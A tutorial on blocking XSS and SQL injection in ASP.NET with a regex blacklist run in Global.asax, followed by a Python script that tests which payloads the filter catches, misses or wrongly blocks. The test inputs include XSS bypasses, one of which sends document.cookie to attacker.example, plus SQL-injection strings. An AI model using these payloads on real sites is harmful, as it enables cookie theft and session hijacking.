Using the Application_BeginRequest event in Global.asax to filter malicious XSS script submitted by the client

Source: Internet
Author: User

Cross-site scripting (XSS) is a security vulnerability in web applications that lets a malicious user embed HTML or client-side script into pages that are shown to other users. To prevent it, the user's input must be checked before the request is processed, and the request rejected when the input is not legitimate. An ASP.NET website has a global application file, Global.asax, in its root; every request that IIS hands to ASP.NET runs through the events defined in this file in sequence. The Application_BeginRequest event fires when ASP.NET starts processing a request, so code in its handler runs before any page or service sees the request. That makes it a convenient place to check whether the client's input is acceptable. Note that the approach below is a blacklist: it rejects requests containing known-bad fragments, so it will miss payloads that avoid the listed keywords and will also reject legitimate text that happens to contain them. Treat it as a defence-in-depth layer in front of, not a replacement for, encoding untrusted data on output.

First, create an XssFilter class in the App_Code folder, the folder ASP.NET creates by default for a website's shared classes:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Text.RegularExpressions;

/// <summary>
/// Summary description for XssFilter
/// </summary>
public class XssFilter
{
    public XssFilter() { }

    // Blacklist of XSS and SQL-injection fragments. A request is rejected as soon as
    // any checked value matches one of the alternatives.
    private const string StrRegex = @"<[^>]+?style=[\w]+?:expression\(|\b(alert|confirm|prompt)\b|^\+/v(8|9)|<[^>]*?=[^>]*?&#[^>]*?>|\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|/\*.+?\*/|<\s*script\b|<\s*img\b|\bexec\b|union.+?select|update.+?set|insert\s+into.+?values|(select|delete).+?from|(create|alter|drop|truncate)\s+(table|database)";

    // Checks every field of a form-encoded POST body.
    public static bool PostData()
    {
        bool result = false;
        try
        {
            for (int i = 0; i < HttpContext.Current.Request.Form.Count; i++)
            {
                result = CheckData(HttpContext.Current.Request.Form[i].ToString());
                if (result)
                {
                    break;
                }
            }
        }
        catch (HttpRequestValidationException)
        {
            // ASP.NET's built-in request validation already rejected the value.
            return true;
        }
        return result;
    }

    // Checks every query-string parameter.
    public static bool GetData()
    {
        bool result = false;
        try
        {
            for (int i = 0; i < HttpContext.Current.Request.QueryString.Count; i++)
            {
                result = CheckData(HttpContext.Current.Request.QueryString[i].ToString());
                if (result)
                {
                    break;
                }
            }
        }
        catch (HttpRequestValidationException)
        {
            return true;
        }
        return result;
    }

    // Checks the value of every cookie sent with the request.
    public static bool CookieData()
    {
        bool result = false;
        try
        {
            for (int i = 0; i < HttpContext.Current.Request.Cookies.Count; i++)
            {
                result = CheckData(HttpContext.Current.Request.Cookies[i].Value.ToLower());
                if (result)
                {
                    break;
                }
            }
        }
        catch (HttpRequestValidationException)
        {
            return true;
        }
        return result;
    }

    // Checks the Referer header; the caller must make sure UrlReferrer is not null.
    public static bool Referer()
    {
        return CheckData(HttpContext.Current.Request.UrlReferrer.ToString());
    }

    // Returns true when the value matches the blacklist. IgnoreCase is required:
    // the pattern lists lower-case keywords, so without it "<SCRIPT>" would slip past.
    public static bool CheckData(string inputData)
    {
        return Regex.IsMatch(inputData, StrRegex, RegexOptions.IgnoreCase);
    }
}

Then add the following to the Application_BeginRequest event handler in Global.asax:

void Application_BeginRequest(object sender, EventArgs e)
{
    if (Request.Cookies != null)
    {
        if (XssFilter.CookieData())
        {
            Response.Write("The cookie data you submitted contains malicious characters!");
            Response.End();
        }
    }
    if (Request.UrlReferrer != null)
    {
        if (XssFilter.Referer())
        {
            Response.Write("The referrer data you submitted contains malicious characters!");
            Response.End();
        }
    }
    if (Request.RequestType.ToUpper() == "POST")
    {
        if (XssFilter.PostData())
        {
            Response.Write("The POST data you submitted contains malicious characters!");
            Response.End();
        }
    }
    if (Request.RequestType.ToUpper() == "GET")
    {
        if (XssFilter.GetData())
        {
            Response.Write("The GET data you submitted contains malicious characters!");
            Response.End();
        }
    }
}

To test, submit a form field, or edit the URL query string, so that it contains a line of script such as <script>alert('Test')</script>; the request is stopped in Application_BeginRequest and the error message is returned in place of the page. The check covers form fields, the query string, cookies and the Referer header only: a POST body that is not form-encoded (for example JSON) does not appear in Request.Form and is not inspected, and no other headers are examined.
If you submit asynchronously with Ajax, the response body of a rejected request is the error message rather than the data the page expects, so the client-side callback must check for that case.
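As an added example that is not part of the original post, the following Python script ports the StrRegex pattern above and runs it over constructed inputs to show what a practitioner should know about this blacklist before relying on it: which payloads it catches, which it lets through, and which harmless text it blocks. The payloads, the form dictionaries and the attacker.example host name are constructed for illustration. The regex is assumed to behave the same in Python's re module as in .NET for these inputs, since it uses only word boundaries, character classes, lazy quantifiers and alternation; Regex.IsMatch without RegexOptions.IgnoreCase is case-sensitive, so each input is checked both ways.

```python
import re

# Port of the page's StrRegex blacklist (assumed equivalent to the .NET pattern
# for the inputs below). Each line is one alternative of the top-level alternation.
BLACKLIST = (
    r"<[^>]+?style=[\w]+?:expression\("
    r"|\b(alert|confirm|prompt)\b"
    r"|^\+/v(8|9)"
    r"|<[^>]*?=[^>]*?&#[^>]*?>"
    r"|\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)"
    r"|/\*.+?\*/"
    r"|<\s*script\b"
    r"|<\s*img\b"
    r"|\bexec\b"
    r"|union.+?select"
    r"|update.+?set"
    r"|insert\s+into.+?values"
    r"|(select|delete).+?from"
    r"|(create|alter|drop|truncate)\s+(table|database)"
)

CASE_SENSITIVE = re.compile(BLACKLIST)                  # Regex.IsMatch default
CASE_INSENSITIVE = re.compile(BLACKLIST, re.IGNORECASE)  # with RegexOptions.IgnoreCase


def check_data(value, ignore_case=False):
    """Mirror of CheckData: True means the value is rejected."""
    pattern = CASE_INSENSITIVE if ignore_case else CASE_SENSITIVE
    return pattern.search(value) is not None


def check_request(fields, ignore_case=False):
    """Mirror of PostData/GetData: reject the request if any field matches."""
    return any(check_data(v, ignore_case) for v in fields.values())


# Constructed inputs (not from the page).
CAUGHT = [
    "<script>alert('Test')</script>",            # the page's own test string
    "' or 1=1 --",                                # \b(and|or)\b.{1,6}?=
    "1 union select password from users",         # union.+?select
]
MISSED = [
    # No blacklisted keyword at all: executes script on load.
    "<svg onload=eval(name)>",
    # Exfiltrates the cookie without alert/confirm/prompt, script or img.
    "<input autofocus onfocus=location='//attacker.example/?c='+document.cookie>",
    # Upper-case tag defeats <\s*script\b when the match is case-sensitive.
    "<SCRIPT SRC=//attacker.example/x.js></SCRIPT>",
]
FALSE_POSITIVES = [
    "Please select a colour from the list",       # trips (select|delete).+?from
    "Coffee or tea in the morning",               # trips \b(and|or)\b.{1,6}?\bin\b
]


def classify(values, ignore_case=False):
    """Return {value: blocked?} for a batch of candidate inputs."""
    return {v: check_data(v, ignore_case) for v in values}


if __name__ == "__main__":
    for label, values in (("caught", CAUGHT), ("missed", MISSED),
                          ("false positives", FALSE_POSITIVES)):
        print(label)
        for value, blocked in classify(values).items():
            also = classify([value], ignore_case=True)[value]
            print(f"  blocked={blocked!s:5} (ignore_case={also!s:5})  {value}")
```

Only the upper-case payload changes outcome when the match is made case-insensitive; the other two bypasses contain none of the listed fragments in any case, and the two harmless sentences are rejected either way. Whatever the filter catches, the page that renders the data still has to encode it.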
